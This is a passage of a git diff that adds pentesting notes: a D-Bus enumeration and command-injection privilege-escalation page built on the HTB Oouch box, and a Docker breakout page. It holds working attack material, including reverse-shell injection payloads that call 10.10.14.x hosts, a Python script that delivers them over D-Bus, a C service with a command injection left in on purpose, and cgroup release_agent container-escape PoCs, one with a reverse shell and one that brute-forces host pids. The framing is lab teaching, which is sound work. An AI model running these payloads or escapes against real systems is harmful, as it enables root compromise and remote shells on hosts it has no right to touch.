-t registry:5000/modified-ubuntu:latest ubuntu bash +``` + +Then you can use some of the techniques mentioned in the following page to **escape from it abusing privileged capabilities**: + +{% page-ref page="docker-breakout.md" %} + diff --git a/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md b/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md new file mode 100644 index 00000000000..612b4fb2e1a --- /dev/null +++ b/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md @@ -0,0 +1,433 @@ +# D-Bus Enumeration & Command Injection Privilege Escalation + +**The examples of this page are based on the Oouch box from HTB.** + +## **GUI enumeration** + +**\(This enumeration info was taken from** [**https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/**](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/)**\)** + +Ubuntu desktop utilizes D-Bus as its inter-process communications \(IPC\) mediator. On Ubuntu, there are several message buses that run concurrently: A system bus, which is mainly used by privileged services to expose system-wide relevant services, and one session bus for each logged in user, which exposes services that are only relevant to that specific user. Since we will try to elevate our privileges, we will mainly focus on the system bus as the services there tend to run with higher privileges \(i.e. root\). Note that the D-Bus architecture utilizes one ‘router’ per session bus, which redirects client messages to the relevant services they are trying to interact with. Clients need to specify the address of the service to which they want to send messages. + +Each service is defined by the **objects** and **interfaces** that it exposes. We can think of objects as instances of classes in standard OOP languages. Each unique instance is identified by its **object path** – a string which resembles a file system path that uniquely identifies each object that the service exposes. A standard interface that will help with our research is the **org.freedesktop.DBus.Introspectable** interface. It contains a single method, Introspect, which returns an XML representation of the methods, signals and properties supported by the object. This blog post focuses on methods and ignores properties and signals. + +I used two tools to communicate with the D-Bus interface: CLI tool named **gdbus**, which allows to easily call D-Bus exposed methods in scripts, and [**D-Feet**](https://wiki.gnome.org/Apps/DFeet), a Python based GUI tool that helps to enumerate the available services on each bus and to see which objects each service contains. + +![](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-21.png) + +_Figure 1. D-Feet main window_ + +![](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png) + +_Figure 2. D-Feet interface window_ + +D-Feet is an excellent tool that proved essential during my research. On the left pane in Figure 1 you can see all the various services that have registered with the D-Bus daemon system bus \(note the select System Bus button on the top\). I selected the **org.debin.apt** service, and D-Feet automatically queried the service for all the available objects. Once I selected a specific object, the set of all interfaces, with their respective methods properties and signals are listed, as seen in Figure 2. Note that we also get the signature of each IPC exposed method. + +We can also see the pid of the process that hosts each service, as well as its command line. This is a very useful feature, since we can validate that the target service we are inspecting indeed runs with higher privileges. Some services on the System bus don’t run as root, and thus are less interesting to research. + +D-Feet also allows one to call the various methods. In the method input screen we can specify a list of Python expressions, delimited by commas, to be interpreted as the parameters to the invoked function, shown in Figure 3. Python types are marshaled to D-Bus types and passed to the service. + +![](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-23.png) + +_Figure 3. Calling D-Bus Methods through D-Feet_ + +Some methods require authentication before allowing us to invoke them. We will ignore these methods, since our goal is to elevate our privileges without credentials in the first place. + +![](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-24.png) + +_Figure 4. A method that requires authorization_ + +Also note that some of the services query another D-Bus service named org.freedeskto.PolicyKit1 whether a user should be allowed to perform certain actions or not. We will come back to this later in this blog post. + +## **Cmd line Enumeration** + +### List Service Objects + +It's possible to list opened D-Bus interfaces with: + +```bash +busctl list #List D-Bus interfaces + +NAME PID PROCESS USER CONNECTION UNIT SE +:1.0 1 systemd root :1.0 init.scope - +:1.1345 12817 busctl qtc :1.1345 session-729.scope 72 +:1.2 1576 systemd-timesyn systemd-timesync :1.2 systemd-timesyncd.service - +:1.3 2609 dbus-server root :1.3 dbus-server.service - +:1.4 2606 wpa_supplicant root :1.4 wpa_supplicant.service - +:1.6 2612 systemd-logind root :1.6 systemd-logind.service - +:1.8 3087 unattended-upgr root :1.8 unattended-upgrades.serv… - +:1.820 6583 systemd qtc :1.820 user@1000.service - +com.ubuntu.SoftwareProperties - - - (activatable) - - +fi.epitest.hostap.WPASupplicant 2606 wpa_supplicant root :1.4 wpa_supplicant.service - +fi.w1.wpa_supplicant1 2606 wpa_supplicant root :1.4 wpa_supplicant.service - +htb.oouch.Block 2609 dbus-server root :1.3 dbus-server.service - +org.bluez - - - (activatable) - - +org.freedesktop.DBus 1 systemd root - init.scope - +org.freedesktop.PackageKit - - - (activatable) - - +org.freedesktop.PolicyKit1 - - - (activatable) - - +org.freedesktop.hostname1 - - - (activatable) - - +org.freedesktop.locale1 - - - (activatable) - - +``` + +### Service Object Info + +Then, you can obtain some information about the interface with: + +```bash +busctl status htb.oouch.Block #Get info of "htb.oouch.Block" interface + +PID=2609 +PPID=1 +TTY=n/a +UID=0 +EUID=0 +SUID=0 +FSUID=0 +GID=0 +EGID=0 +SGID=0 +FSGID=0 +SupplementaryGIDs= +Comm=dbus-server +CommandLine=/root/dbus-server +Label=unconfined +CGroup=/system.slice/dbus-server.service +Unit=dbus-server.service +Slice=system.slice +UserUnit=n/a +UserSlice=n/a +Session=n/a +AuditLoginUID=n/a +AuditSessionID=n/a +UniqueName=:1.3 +EffectiveCapabilities=cap_chown cap_dac_override cap_dac_read_search + cap_fowner cap_fsetid cap_kill cap_setgid + cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service + cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock + cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot + cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot + cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config + cap_mknod cap_lease cap_audit_write cap_audit_control + cap_setfcap cap_mac_override cap_mac_admin cap_syslog + cap_wake_alarm cap_block_suspend cap_audit_read +PermittedCapabilities=cap_chown cap_dac_override cap_dac_read_search + cap_fowner cap_fsetid cap_kill cap_setgid + cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service + cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock + cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot + cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot + cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config + cap_mknod cap_lease cap_audit_write cap_audit_control + cap_setfcap cap_mac_override cap_mac_admin cap_syslog + cap_wake_alarm cap_block_suspend cap_audit_read +InheritableCapabilities= +BoundingCapabilities=cap_chown cap_dac_override cap_dac_read_search + cap_fowner cap_fsetid cap_kill cap_setgid + cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service + cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock + cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot + cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot + cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config + cap_mknod cap_lease cap_audit_write cap_audit_control + cap_setfcap cap_mac_override cap_mac_admin cap_syslog + cap_wake_alarm cap_block_suspend cap_audit_read +``` + +### List Interfaces of a Service Object + +You need to have enough permissions. + +```bash +busctl tree htb.oouch.Block #Get Interfaces of the service object + +└─/htb + └─/htb/oouch + └─/htb/oouch/Block +``` + +### Introspect Interface of a Service Object + +Note how in this example it was selected the latest interface discovered using the `tree` parameter \(_see previous section_\): + +```bash +busctl introspect htb.oouch.Block /htb/oouch/Block #Get methods of the interface + +NAME TYPE SIGNATURE RESULT/VALUE FLAGS +htb.oouch.Block interface - - - +.Block method s s - +org.freedesktop.DBus.Introspectable interface - - - +.Introspect method - s - +org.freedesktop.DBus.Peer interface - - - +.GetMachineId method - s - +.Ping method - - - +org.freedesktop.DBus.Properties interface - - - +.Get method ss v - +.GetAll method s a{sv} - +.Set method ssv - - +.PropertiesChanged signal sa{sv}as - - +``` + +Note the method `.Block` of the interface `htb.oouch.Block` \(the one we are interested in\). The "s" of the other columns may mean that it's expecting a string. + +### Monitor/Capture Interface + +With enough privileges \(just `send_destination` and `receive_sender` privileges aren't enough\) you can monitor a D-Bus communication. In the following example the interface `htb.oouch.Block` is monitored and **the message "**_**lalalalal**_**" is sent through miscommunication**: + +```bash +busctl monitor htb.oouch.Block + +Monitoring bus message stream. +‣ Type=method_call Endian=l Flags=0 Version=1 Priority=0 Cookie=2 + Sender=:1.1376 Destination=htb.oouch.Block Path=/htb/oouch/Block Interface=htb.oouch.Block Member=Block + UniqueName=:1.1376 + MESSAGE "s" { + STRING "lalalalal"; + }; + +‣ Type=method_return Endian=l Flags=1 Version=1 Priority=0 Cookie=16 ReplyCookie=2 + Sender=:1.3 Destination=:1.1376 + UniqueName=:1.3 + MESSAGE "s" { + STRING "Carried out :D"; + }; +``` + +You can use `capture` instead of `monitor` to save the results in a pcap file. + +### More + +`busctl` have even more options, [**find all of them here**](https://www.freedesktop.org/software/systemd/man/busctl.html). + +## **Vulnerable Scenario** + +As user **qtc inside the host "oouch"** you can find an **unexpected D-Bus config file** located in _/etc/dbus-1/system.d/htb.oouch.Block.conf_: + +```markup + + + + + + + + + + + + + + + + +``` + +Note from the previous configuration that **you will need to be the user `root` or `www-data` to send and receive information** via this D-BUS communication. + +As user **qtc** inside the docker container **aeb4525789d8** you can find some dbus related code in the file _/code/oouch/routes.py._ This is the interesting code: + +```python +if primitive_xss.search(form.textfield.data): + bus = dbus.SystemBus() + block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block') + block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block') + + client_ip = request.environ.get('REMOTE_ADDR', request.remote_addr) + response = block_iface.Block(client_ip) + bus.close() + return render_template('hacker.html', title='Hacker') +``` + +As you can see, it is **connecting to a D-Bus interface** and sending to the **"Block" function** the "client\_ip". + +In the other side of the D-Bus connection there is some C compiled binary running. This code is **listening** in the D-Bus connection **for IP address and is calling iptables via `system` function** to block the given IP address. +**The call to `system` is vulnerable on purpose to command injection**, so a payload like the following one will create a reverse shell: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #` + +### Exploit it + +At the end of this page you can find the **complete C code of the D-Bus application**. Inside of it you can find between the lines 91-97 **how the** _**D-Bus object path**_ **and** _**interface name**_ **are registered**. This information will be necessary to send information to the D-Bus connection: + +```c + /* Install the object */ + r = sd_bus_add_object_vtable(bus, + &slot, + "/htb/oouch/Block", /* interface */ + "htb.oouch.Block", /* service object */ + block_vtable, + NULL); +``` + +Also, in line 57 you can find that **the only method registered** for this D-Bus communication is called `Block`\(_**Thats why in the following section the payloads are going to be sent to the service object `htb.oouch.Block`, the interface `/htb/oouch/Block` and the method name `Block`**_\): + +```c +SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED), +``` + +#### Python + +The following python code will send the payload to the D-Bus connection to the `Block` method via `block_iface.Block(runme)` \(_note that it was extracted from the previous chunk of code_\): + +```python +import dbus +bus = dbus.SystemBus() +block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block') +block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block') +runme = ";bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #" +response = block_iface.Block(runme) +bus.close() +``` + +#### busctl and dbus-send + +```bash +dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:';pring -c 1 10.10.14.44 #' +``` + +* `dbus-send` is a tool used to send message to “Message Bus” +* Message Bus – A software used by systems to make communications between applications easily. It’s related to Message Queue \(messages are ordered in sequence\) but in Message Bus the messages are sending in a subscription model and also very quick. +* “-system” tag is used to mention that it is a system message, not a session message \(by default\). +* “–print-reply” tag is used to print our message appropriately and receives any replies in a human-readable format. +* “–dest=Dbus-Interface-Block” The address of the Dbus interface. +* “–string:” – Type of message we like to send to the interface. There are several formats of sending messages like double, bytes, booleans, int, objpath. Out of this, the “object path” is useful when we want to send a path of a file to the Dbus interface. We can use a special file \(FIFO\) in this case to pass a command to interface in the name of a file. “string:;” – This is to call the object path again where we place of FIFO reverse shell file/command. + +_Note that in `htb.oouch.Block.Block`, the first part \(`htb.oouch.Block`\) references the service object and the last part \(`.Block`\) references the method name._ + +### C code + +```c +#include +#include +#include +#include +#include +#include + +static int method_block(sd_bus_message *m, void *userdata, sd_bus_error *ret_error) { + char* host = NULL; + int r; + + /* Read the parameters */ + r = sd_bus_message_read(m, "s", &host); + if (r < 0) { + fprintf(stderr, "Failed to obtain hostname: %s\n", strerror(-r)); + return r; + } + + char command[] = "iptables -A PREROUTING -s %s -t mangle -j DROP"; + + int command_len = strlen(command); + int host_len = strlen(host); + + char* command_buffer = (char *)malloc((host_len + command_len) * sizeof(char)); + if(command_buffer == NULL) { + fprintf(stderr, "Failed to allocate memory\n"); + return -1; + } + + sprintf(command_buffer, command, host); + + /* In the first implementation, we simply ran command using system(), since the expected DBus + * to be threading automatically. However, DBus does not thread and the application will hang + * forever if some user spawns a shell. Thefore we need to fork (easier than implementing real + * multithreading) + */ + int pid = fork(); + + if ( pid == 0 ) { + /* Here we are in the child process. We execute the command and eventually exit. */ + system(command_buffer); + exit(0); + } else { + /* Here we are in the parent process or an error occured. We simply send a genric message. + * In the first implementation we returned separate error messages for success or failure. + * However, now we cannot wait for results of the system call. Therefore we simply return + * a generic. */ + return sd_bus_reply_method_return(m, "s", "Carried out :D"); + } + r = system(command_buffer); +} + + +/* The vtable of our little object, implements the net.poettering.Calculator interface */ +static const sd_bus_vtable block_vtable[] = { + SD_BUS_VTABLE_START(0), + SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED), + SD_BUS_VTABLE_END +}; + + +int main(int argc, char *argv[]) { + /* + * Main method, registeres the htb.oouch.Block service on the system dbus. + * + * Paramaters: + * argc (int) Number of arguments, not required + * argv[] (char**) Argument array, not required + * + * Returns: + * Either EXIT_SUCCESS ot EXIT_FAILURE. Howeverm ideally it stays alive + * as long as the user keeps it alive. + */ + + + /* To prevent a huge numer of defunc process inside the tasklist, we simply ignore client signals */ + signal(SIGCHLD,SIG_IGN); + + sd_bus_slot *slot = NULL; + sd_bus *bus = NULL; + int r; + + /* First we need to connect to the system bus. */ + r = sd_bus_open_system(&bus); + if (r < 0) + { + fprintf(stderr, "Failed to connect to system bus: %s\n", strerror(-r)); + goto finish; + } + + /* Install the object */ + r = sd_bus_add_object_vtable(bus, + &slot, + "/htb/oouch/Block", /* interface */ + "htb.oouch.Block", /* service object */ + block_vtable, + NULL); + if (r < 0) { + fprintf(stderr, "Failed to install htb.oouch.Block: %s\n", strerror(-r)); + goto finish; + } + + /* Register the service name to find out object */ + r = sd_bus_request_name(bus, "htb.oouch.Block", 0); + if (r < 0) { + fprintf(stderr, "Failed to acquire service name: %s\n", strerror(-r)); + goto finish; + } + + /* Infinite loop to process the client requests */ + for (;;) { + /* Process requests */ + r = sd_bus_process(bus, NULL); + if (r < 0) { + fprintf(stderr, "Failed to process bus: %s\n", strerror(-r)); + goto finish; + } + if (r > 0) /* we processed a request, try to process another one, right-away */ + continue; + + /* Wait for the next request to process */ + r = sd_bus_wait(bus, (uint64_t) -1); + if (r < 0) { + fprintf(stderr, "Failed to wait on bus: %s\n", strerror(-r)); + goto finish; + } + } + +finish: + sd_bus_slot_unref(slot); + sd_bus_unref(bus); + + return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS; +} +``` + diff --git a/linux-unix/privilege-escalation/docker-breakout.md b/linux-unix/privilege-escalation/docker-breakout.md new file mode 100644 index 00000000000..419215dccfe --- /dev/null +++ b/linux-unix/privilege-escalation/docker-breakout.md @@ -0,0 +1,537 @@ +# Docker Breakout + +## Mounted docker socket + +If somehow you find that the **docker socket is mounted** inside the docker container, you will be able to escape from it. +This usually happen in docker containers that for some reason need to connect to docker daemon to perform actions. + +```bash +#Search the socket +find / -name docker.sock 2>/dev/null +#It's usually in /run/docker.sock +``` + +In this case you can use regular docker commands to communicate with the docker daemon: + +```bash +#List images to use one +docker images +#Run the image mounting the host disk and chroot on it +docker run -it -v /:/host/ ubuntu:18.04 chroot /host/ bash +``` + +{% hint style="info" %} +In case the **docker socket is in an unexpected place** you can still communicate with it using the **`docker`** command with the parameter **`-H unix:///path/to/docker.sock`** +{% endhint %} + +## Container Capabilities + +You should check the capabilities of the container, if it has any of the following ones, you might be able to scape from it: **`CAP_SYS_ADMIN`**_,_ **`CAP_SYS_PTRACE`**, **`CAP_SYS_MODULE`**, **`DAC_READ_SEARCH`**, **`DAC_OVERRIDE`** + +You can check currently container capabilities with: + +```bash +capsh --print +``` + +In the following page you can **learn more about linux capabilities** and how to abuse them: + +{% page-ref page="linux-capabilities.md" %} + +## `--privileged` flag + +The --privileged flag allows the container to have access to the host devices. + +### I own Root + +Well configured docker containers won't allow command like **fdisk -l**. However on missconfigured docker command where the flag --privileged is specified, it is possible to get the privileges to see the host drive. + +![](https://bestestredteam.com/content/images/2019/08/image-16.png) + +So to take over the host machine, it is trivial: + +```bash +mkdir -p /mnt/hola +mount /dev/sda1 /mnt/hola +``` + +And voilà ! You can now acces the filesystem of the host because it is mounted in the /mnt/hole folder. + +{% code title="Initial PoC" %} +```bash +# spawn a new container to exploit via: +# docker run --rm -it --privileged ubuntu bash + +d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` +mkdir -p $d/w;echo 1 >$d/w/notify_on_release +t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` +touch /o; +echo $t/c >$d/release_agent; +echo "#!/bin/sh $1 >$t/o" >/c; +chmod +x /c; +sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o +``` +{% endcode %} + +{% code title="Second PoC" %} +```bash +# On the host +docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash + +# In the container +mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x + +echo 1 > /tmp/cgrp/x/notify_on_release +host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` +echo "$host_path/cmd" > /tmp/cgrp/release_agent + +#For a normal PoC ================= +echo '#!/bin/sh' > /cmd +echo "ps aux > $host_path/output" >> /cmd +chmod a+x /cmd +#=================================== +#Reverse shell +echo '#!/bin/bash' > /cmd +echo "bash -i >& /dev/tcp/10.10.14.21/9000 0>&1" >> /cmd +chmod a+x /cmd +#=================================== + +sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" +head /output +``` +{% endcode %} + +The `--privileged` flag introduces significant security concerns, and the exploit relies on launching a docker container with it enabled. When using this flag, containers have full access to all devices and lack restrictions from seccomp, AppArmor, and Linux capabilities. + +In fact, `--privileged` provides far more permissions than needed to escape a docker container via this method. In reality, the “only” requirements are: + +1. We must be running as root inside the container +2. The container must be run with the `SYS_ADMIN` Linux capability +3. The container must lack an AppArmor profile, or otherwise allow the `mount` syscall +4. The cgroup v1 virtual filesystem must be mounted read-write inside the container + +The `SYS_ADMIN` capability allows a container to perform the mount syscall \(see [man 7 capabilities](https://linux.die.net/man/7/capabilities)\). [Docker starts containers with a restricted set of capabilities](https://docs.docker.com/engine/security/security/#linux-kernel-capabilities) by default and does not enable the `SYS_ADMIN` capability due to the security risks of doing so. + +Further, Docker [starts containers with the `docker-default` AppArmor](https://docs.docker.com/engine/security/apparmor/#understand-the-policies) policy by default, which [prevents the use of the mount syscall](https://github.com/docker/docker-ce/blob/v18.09.8/components/engine/profiles/apparmor/template.go#L35) even when the container is run with `SYS_ADMIN`. + +A container would be vulnerable to this technique if run with the flags: `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN` + +### Breaking down the proof of concept + +Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works. + +To trigger this exploit we need a cgroup where we can create a `release_agent` file and trigger `release_agent` invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup. + +To do that, we create a `/tmp/cgrp` directory, mount the [RDMA](https://www.kernel.org/doc/Documentation/cgroup-v1/rdma.txt) cgroup controller and create a child cgroup \(named “x” for the purposes of this example\). While every cgroup controller has not been tested, this technique should work with the majority of cgroup controllers. + +If you’re following along and get “mount: /tmp/cgrp: special device cgroup does not exist”, it’s because your setup doesn’t have the RDMA cgroup controller. Change `rdma` to `memory` to fix it. We’re using RDMA because the original PoC was only designed to work with it. + +Note that cgroup controllers are global resources that can be mounted multiple times with different permissions and the changes rendered in one mount will apply to another. + +We can see the “x” child cgroup creation and its directory listing below. + +```text +root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x +root@b11cf9eab4fd:/# ls /tmp/cgrp/ +cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks x +root@b11cf9eab4fd:/# ls /tmp/cgrp/x +cgroup.clone_children cgroup.procs notify_on_release rdma.current rdma.max tasks +``` + +Next, we enable cgroup notifications on release of the “x” cgroup by writing a 1 to its `notify_on_release` file. We also set the RDMA cgroup release agent to execute a `/cmd` script — which we will later create in the container — by writing the `/cmd` script path on the host to the `release_agent` file. To do it, we’ll grab the container’s path on the host from the `/etc/mtab` file. + +The files we add or modify in the container are present on the host, and it is possible to modify them from both worlds: the path in the container and their path on the host. + +Those operations can be seen below: + +```text +root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release +root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` +root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent +``` + +Note the path to the `/cmd` script, which we are going to create on the host: + +```text +root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent +/var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/cmd +``` + +Now, we create the `/cmd` script such that it will execute the `ps aux` command and save its output into `/output` on the container by specifying the full path of the output file on the host. At the end, we also print the `/cmd` script to see its contents: + +```text +root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd +root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd +root@b11cf9eab4fd:/# chmod a+x /cmd +root@b11cf9eab4fd:/# cat /cmd +#!/bin/sh +ps aux > /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/output +``` + +Finally, we can execute the attack by spawning a process that immediately ends inside the “x” child cgroup. By creating a `/bin/sh` process and writing its PID to the `cgroup.procs` file in “x” child cgroup directory, the script on the host will execute after `/bin/sh` exits. The output of `ps aux` performed on the host is then saved to the `/output` file inside the container: + +```text +root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" +root@b11cf9eab4fd:/# head /output +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND +root 1 0.1 1.0 17564 10288 ? Ss 13:57 0:01 /sbin/init +root 2 0.0 0.0 0 0 ? S 13:57 0:00 [kthreadd] +root 3 0.0 0.0 0 0 ? I< 13:57 0:00 [rcu_gp] +root 4 0.0 0.0 0 0 ? I< 13:57 0:00 [rcu_par_gp] +root 6 0.0 0.0 0 0 ? I< 13:57 0:00 [kworker/0:0H-kblockd] +root 8 0.0 0.0 0 0 ? I< 13:57 0:00 [mm_percpu_wq] +root 9 0.0 0.0 0 0 ? S 13:57 0:00 [ksoftirqd/0] +root 10 0.0 0.0 0 0 ? I 13:57 0:00 [rcu_sched] +root 11 0.0 0.0 0 0 ? S 13:57 0:00 [migration/0] +``` + +## `--privileged` flag v2 + +The previous PoCs work fine when the container is configured with a storage-driver which exposes the full host path of the mount point, for example `overlayfs`, however I recently came across a couple of configurations which did not obviously disclose the host file system mount point. + +### Kata Containers + +```text +root@container:~$ head -1 /etc/mtab +kataShared on / type 9p (rw,dirsync,nodev,relatime,mmap,access=client,trans=virtio) +``` + +[Kata Containers](https://katacontainers.io/) by default mounts the root fs of a container over `9pfs`. This discloses no information about the location of the container file system in the Kata Containers Virtual Machine. + +\* More on Kata Containers in a future blog post. + +### Device Mapper + +```text +root@container:~$ head -1 /etc/mtab +/dev/sdc / ext4 rw,relatime,stripe=384 0 0 +``` + +I saw a container with this root mount in a live environment, I believe the container was running with a specific `devicemapper` storage-driver configuration, but at this point I have been unable to replicate this behaviour in a test environment. + +### An Alternative PoC + +Obviously in these cases there is not enough information to identify the path of container files on the host file system, so Felix’s PoC cannot be used as is. However, we can still execute this attack with a little ingenuity. + +The one key piece of information required is the full path, relative to the container host, of a file to execute within the container. Without being able to discern this from mount points within the container we have to look elsewhere. + +#### Proc to the Rescue + +The Linux `/proc` pseudo-filesystem exposes kernel process data structures for all processes running on a system, including those running in different namespaces, for example within a container. This can be shown by running a command in a container and accessing the `/proc` directory of the process on the host:Container + +```bash +root@container:~$ sleep 100 +``` + +```bash +root@host:~$ ps -eaf | grep sleep +root 28936 28909 0 10:11 pts/0 00:00:00 sleep 100 +root@host:~$ ls -la /proc/`pidof sleep` +total 0 +dr-xr-xr-x 9 root root 0 Nov 19 10:03 . +dr-xr-xr-x 430 root root 0 Nov 9 15:41 .. +dr-xr-xr-x 2 root root 0 Nov 19 10:04 attr +-rw-r--r-- 1 root root 0 Nov 19 10:04 autogroup +-r-------- 1 root root 0 Nov 19 10:04 auxv +-r--r--r-- 1 root root 0 Nov 19 10:03 cgroup +--w------- 1 root root 0 Nov 19 10:04 clear_refs +-r--r--r-- 1 root root 0 Nov 19 10:04 cmdline +... +-rw-r--r-- 1 root root 0 Nov 19 10:29 projid_map +lrwxrwxrwx 1 root root 0 Nov 19 10:29 root -> / +-rw-r--r-- 1 root root 0 Nov 19 10:29 sched +... +``` + +_As an aside, the `/proc//root` data structure is one that confused me for a very long time, I could never understand why having a symbolic link to `/` was useful, until I read the actual definition in the man pages:_ + +> /proc/\[pid\]/root +> +> UNIX and Linux support the idea of a per-process root of the filesystem, set by the chroot\(2\) system call. This file is a symbolic link that points to the process’s root directory, and behaves in the same way as exe, and fd/\*. +> +> Note however that this file is not merely a symbolic link. It provides the same view of the filesystem \(including namespaces and the set of per-process mounts\) as the process itself. + +The `/proc//root` symbolic link can be used as a host relative path to any file within a container:Container + +```bash +root@container:~$ echo findme > /findme +root@container:~$ sleep 100 +``` + +```bash +root@host:~$ cat /proc/`pidof sleep`/root/findme +findme +``` + +This changes the requirement for the attack from knowing the full path, relative to the container host, of a file within the container, to knowing the pid of _any_ process running in the container. + +#### Pid Bashing + +This is actually the easy part, process ids in Linux are numerical and assigned sequentially. The `init` process is assigned process id `1` and all subsequent processes are assigned incremental ids. To identify the host process id of a process within a container, a brute force incremental search can be used:Container + +```text +root@container:~$ echo findme > /findme +root@container:~$ sleep 100 +``` + +Host + +```bash +root@host:~$ COUNTER=1 +root@host:~$ while [ ! -f /proc/${COUNTER}/root/findme ]; do COUNTER=$((${COUNTER} + 1)); done +root@host:~$ echo ${COUNTER} +7822 +root@host:~$ cat /proc/${COUNTER}/root/findme +findme +``` + +#### Putting it All Together + +To complete this attack the brute force technique can be used to guess the pid for the path `/proc//root/payload.sh`, with each iteration writing the guessed pid path to the cgroups `release_agent` file, triggering the `release_agent`, and seeing if an output file is created. + +The only caveat with this technique is it is in no way shape or form subtle, and can increase the pid count very high. As no long running processes are kept running this _should_ not cause reliability issues, but don’t quote me on that. + +The below PoC implements these techniques to provide a more generic attack than first presented in Felix’s original PoC for escaping a privileged container using the cgroups `release_agent` functionality: + +```bash +#!/bin/sh + +OUTPUT_DIR="/" +MAX_PID=65535 +CGROUP_NAME="xyx" +CGROUP_MOUNT="/tmp/cgrp" +PAYLOAD_NAME="${CGROUP_NAME}_payload.sh" +PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}" +OUTPUT_NAME="${CGROUP_NAME}_payload.out" +OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}" + +# Run a process for which we can search for (not needed in reality, but nice to have) +sleep 10000 & + +# Prepare the payload script to execute on the host +cat > ${PAYLOAD_PATH} << __EOF__ +#!/bin/sh + +OUTPATH=\$(dirname \$0)/${OUTPUT_NAME} + +# Commands to run on the host< +ps -eaf > \${OUTPATH} 2>&1 +__EOF__ + +# Make the payload script executable +chmod a+x ${PAYLOAD_PATH} + +# Set up the cgroup mount using the memory resource cgroup controller +mkdir ${CGROUP_MOUNT} +mount -t cgroup -o memory cgroup ${CGROUP_MOUNT} +mkdir ${CGROUP_MOUNT}/${CGROUP_NAME} +echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release + +# Brute force the host pid until the output path is created, or we run out of guesses +TPID=1 +while [ ! -f ${OUTPUT_PATH} ] +do + if [ $((${TPID} % 100)) -eq 0 ] + then + echo "Checking pid ${TPID}" + if [ ${TPID} -gt ${MAX_PID} ] + then + echo "Exiting at ${MAX_PID} :-(" + exit 1 + fi + fi + # Set the release_agent path to the guessed pid + echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent + # Trigger execution of the release_agent + sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" + TPID=$((${TPID} + 1)) +done + +# Wait for and cat the output +sleep 1 +echo "Done! Output:" +cat ${OUTPUT_PATH} +``` + +Executing the PoC within a privileged container should provide output similar to: + +```bash +root@container:~$ ./release_agent_pid_brute.sh +Checking pid 100 +Checking pid 200 +Checking pid 300 +Checking pid 400 +Checking pid 500 +Checking pid 600 +Checking pid 700 +Checking pid 800 +Checking pid 900 +Checking pid 1000 +Checking pid 1100 +Checking pid 1200 + +Done! Output: +UID PID PPID C STIME TTY TIME CMD 